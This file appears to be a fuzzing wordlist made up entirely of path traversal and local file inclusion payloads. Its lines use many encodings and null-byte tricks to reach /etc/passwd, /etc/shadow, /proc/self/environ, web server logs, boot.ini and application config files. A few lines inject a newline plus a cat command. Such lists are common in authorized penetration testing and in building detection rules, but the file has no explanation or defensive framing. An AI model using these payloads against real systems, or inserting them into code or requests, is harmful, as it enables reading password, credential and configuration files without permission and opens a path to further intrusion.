%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%    25%5c..%25%5c..%255cboot.ini
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%  25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/shadow
%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%ef%bd%82%ef%bd%8f%ef%bd%8f%ef%bd%94%e2%80%a4%e2%85%b0%ef%bd%8e%e2%85%b0
%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%ef%bd%85%ef%bd%94%e2%85%bd%ef%bc%8f%ef%bd%90%ef%bd%81%ef%bd%93%ef%bd%93%ef%bd%97%e2%85%be
-/etc/pure-ftpd.conf
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8boot.ini
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bcboot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//etc/passwd
....//....//etc/passwd
....//etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/etc/passwd
....\/....\/....\/etc/passwd
....\/....\/etc/passwd
....\/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../apache/logs/access.log
../../../../../../../../../../../../../../../apache/logs/access.log%00
../../../../../../../../../../../../../../../apache/logs/error.log
../../../../../../../../../../../../../../../apache/logs/error.log%00
../../../../../../../../../../../../../../../apache2/logs/access.log
../../../../../../../../../../../../../../../apache2/logs/access.log%00
../../../../../../../../../../../../../../../apache2/logs/error.log
../../../../../../../../../../../../../../../apache2/logs/error.log%00
../../../../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../../../../etc/httpd/logs/acces.log%00
../../../../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00
../../../../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../../../../etc/httpd/logs/error.log%00
../../../../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../../../../etc/httpd/logs/error_log%00
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../opt/lampp/logs/access.log
../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00
../../../../../../../../../../../../../../../opt/lampp/logs/access_log
../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00
../../../../../../../../../../../../../../../opt/lampp/logs/error.log
../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00
../../../../../../../../../../../../../../../opt/lampp/logs/error_log
../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00
../../../../../../../../../../../../../../../opt/xampp/logs/access.log
../../../../../../../../../../../../../../../opt/xampp/logs/access.log%00
../../../../../../../../../../../../../../../opt/xampp/logs/access_log
../../../../../../../../../../../../../../../opt/xampp/logs/access_log%00
../../../../../../../../../../../../../../../opt/xampp/logs/error.log
../../../../../../../../../../../../../../../opt/xampp/logs/error.log%00
../../../../../../../../../../../../../../../opt/xampp/logs/error_log
../../../../../../../../../../../../../../../opt/xampp/logs/error_log%00
../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../../../usr/lib/security/mkuser.default
../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00
../../../../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log
../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log
../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log
../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log
../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00
../../../../../../../../../../../../../../../var/log/access.log
../../../../../../../../../../../../../../../var/log/access.log%00
../../../../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../../../../var/log/access_log%00
../../../../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../../../../var/log/apache/access.log%00
../../../../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../../../../var/log/apache/access_log%00
../../../../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../../../../var/log/apache/error.log%00
../../../../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../../../../var/log/apache/error_log%00
../../../../../../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../../../../../../var/log/apache2/access.log%00
../../../../../../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../../../../../../var/log/apache2/access_log%00
../../../../../../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../../../../../../var/log/apache2/error.log%00
../../../../../../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../../../../../../var/log/apache2/error_log%00
../../../../../../../../../../../../../../../var/log/error.log
../../../../../../../../../../../../../../../var/log/error.log%00
../../../../../../../../../../../../../../../var/log/error_log
../../../../../../../../../../../../../../../var/log/error_log%00
../../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../var/log/httpd/access.log
../../../../../../../../../../../../../../../var/log/httpd/access.log%00
../../../../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../../../../var/log/httpd/access_log%00
../../../../../../../../../../../../../../../var/log/httpd/error.log
../../../../../../../../../../../../../../../var/log/httpd/error.log%00
../../../../../../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../../../../../../var/log/httpd/error_log%00
../../../../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../../../../var/www/logs/access.log%00
../../../../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../../../../var/www/logs/access_log%00
../../../../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../../../../var/www/logs/error.log%00
../../../../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../../../../var/www/logs/error_log%00
../../../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../../etc/security/user
../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../etc/group
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../etc/security/user
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../etc/group
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/security/group
../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../etc/security/user
../../../../../../../../../../../etc/shadow
../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../etc/group
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/security/group
../../../../../../../../../../etc/security/passwd
../../../../../../../../../../etc/security/user
../../../../../../../../../../etc/shadow
../../../../../../../../../../proc/self/environ
../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../etc/group
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/security/group
../../../../../../../../../etc/security/passwd
../../../../../../../../../etc/security/user
../../../../../../../../../etc/shadow
../../../../../../../../../proc/self/environ
../../../../../../../../../proc/self/environ%00
../../../../../../../../../proc/self/fd/8
../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../conf/server.xml
../../../../../../../../etc/group
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd%00
../../../../../../../../etc/security/group
../../../../../../../../etc/security/passwd
../../../../../../../../etc/security/user
../../../../../../../../etc/shadow
../../../../../../../../proc/self/environ
../../../../../../../../proc/self/environ%00
../../../../../../../../proc/self/fd/8
../../../../../../../../proc/self/fd/8%00
../../../../../../../../var/log/httpd-access.log
../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../windows/win.ini
../../../../../../../dev
../../../../../../../etc/group
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/passwd
../../../../../../../etc/passwd%00
../../../../../../../etc/security/group
../../../../../../../etc/security/passwd
../../../../../../../etc/security/user
../../../../../../../etc/shadow
../../../../../../../logs/access_log
../../../../../../../logs/error_log
../../../../../../../proc/self/environ
../../../../../../../proc/self/environ%00
../../../../../../../proc/self/fd/8
../../../../../../../proc/self/fd/8%00
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../var/log/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/httpd-access.log
../../../../../../../var/log/httpd-access.log%00
../../../../../../../var/www/logs/access.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/error.log
../../../../../../../var/www/logs/error_log
../../../../../../etc/group
../../../../../../etc/passwd
../../../../../../etc/passwd%00
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../../../../etc/security/group
../../../../../../etc/security/passwd
../../../../../../etc/security/user
../../../../../../etc/shadow
../../../../../../logs/access_log
../../../../../../logs/error_log
../../../../../../proc/self/environ
../../../../../../proc/self/environ%00
../../../../../../proc/self/fd/8
../../../../../../proc/self/fd/8%00
../../../../../../var/log/httpd-access.log
../../../../../../var/log/httpd-access.log%00
../../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../etc/group
../../../../../etc/httpd/logs/access.log
../../../../../etc/httpd/logs/access_log
../../../../../etc/httpd/logs/error.log
../../../../../etc/httpd/logs/error_log
../../../../../etc/passwd
../../../../../etc/passwd%00
../../../../../etc/security/group
../../../../../etc/security/passwd
../../../../../etc/security/user
../../../../../etc/shadow
../../../../../logs/access.log
../../../../../logs/access_log
../../../../../logs/error.log
../../../../../logs/error_log
../../../../../proc/self/environ
../../../../../proc/self/environ%00
../../../../../proc/self/fd/8
../../../../../proc/self/fd/8%00
../../../../../usr/local/apache/logs/access.log
../../../../../usr/local/apache/logs/access_log
../../../../../usr/local/apache/logs/error.log
../../../../../usr/local/apache/logs/error_log
../../../../../var/log/access_log
../../../../../var/log/apache/access.log
../../../../../var/log/apache/access_log
../../../../../var/log/apache/error.log
../../../../../var/log/apache/error_log
../../../../../var/log/error_log
../../../../../var/log/httpd-access.log
../../../../../var/log/httpd-access.log%00
../../../../../var/log/httpd/access_log
../../../../../var/log/httpd/error_log
../../../../../var/www/logs/access.log
../../../../../var/www/logs/error.log
../../../../../var/www/logs/error_log
../../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../etc/group
../../../../etc/passwd
../../../../etc/passwd%00
../../../../etc/security/group
../../../../etc/security/passwd
../../../../etc/security/user
../../../../etc/shadow
../../../../logs/access.log
../../../../logs/access_log
../../../../logs/error.log
../../../../logs/error_log
../../../../proc/self/environ
../../../../proc/self/environ%00
../../../../proc/self/fd/8
../../../../proc/self/fd/8%00
../../../../var/log/httpd-access.log
../../../../var/log/httpd-access.log%00
../../../administrator/inbox
../../../apache/logs/access.log
../../../apache/logs/error.log
../../../etc/group
../../../etc/passwd
../../../etc/passwd%00
../../../etc/security/group
../../../etc/security/passwd
../../../etc/security/user
../../../etc/shadow
../../../logs/access.log
../../../logs/access_log
../../../logs/error.log
../../../proc/self/environ
../../../proc/self/environ%00
../../../proc/self/fd/8
../../../proc/self/fd/8%00
../../../var/log/httpd-access.log
../../../var/log/httpd-access.log%00
../../apache/logs/access.log
../../apache/logs/error.log
../../boot.ini
../../etc/group
../../etc/passwd
../../etc/passwd%00
../../etc/security/group
../../etc/security/passwd
../../etc/security/user
../../etc/shadow
../../logs/access.log
../../logs/access_log
../../logs/error.log
../../logs/error_log
../../proc/self/environ
../../proc/self/environ%00
../../proc/self/fd/8
../../proc/self/fd/8%00
../../var/log/httpd-access.log
../../var/log/httpd-access.log%00
../../windows/win.ini
../.htpasswd
../.pass
../.passwd
..//..//..//..//..//boot.ini
../_config.php
../_config.php%00
../apache/logs/access.log
../apache/logs/error.log
../config.asp
../config.inc.php
../config.js
../config.php
../etc/group
../etc/passwd
../etc/passwd%00
../etc/security/group
../etc/security/passwd
../etc/security/user
../etc/shadow
../install.php
../logs/access.log
../logs/access_log
../logs/error.log
../logs/error_log
../proc/self/environ
../proc/self/environ%00
../proc/self/fd/8
../proc/self/fd/8%00
../users.db.php
../var/log/httpd-access.log
../var/log/httpd-access.log%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2fapache2flogs2faccess.log
..2f..2f..2fapache2flogs2ferror.log
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2fapache2flogs2faccess.log
..2f..2fapache2flogs2ferror.log
..2f..2fetc2fpasswd
..2f..2fetc2fpasswd%00
..2fapache2flogs2faccess.log
..2fapache2flogs2ferror.log
..2fetc2fpasswd
..2fetc2fpasswd%00
..\../..\../..\../..\../boot.ini
..\../..\../boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\windows\win.ini
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
.htpasswd
.pass
.passwd
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/.../.../.../.../.../
/../../../../../../../../%2A
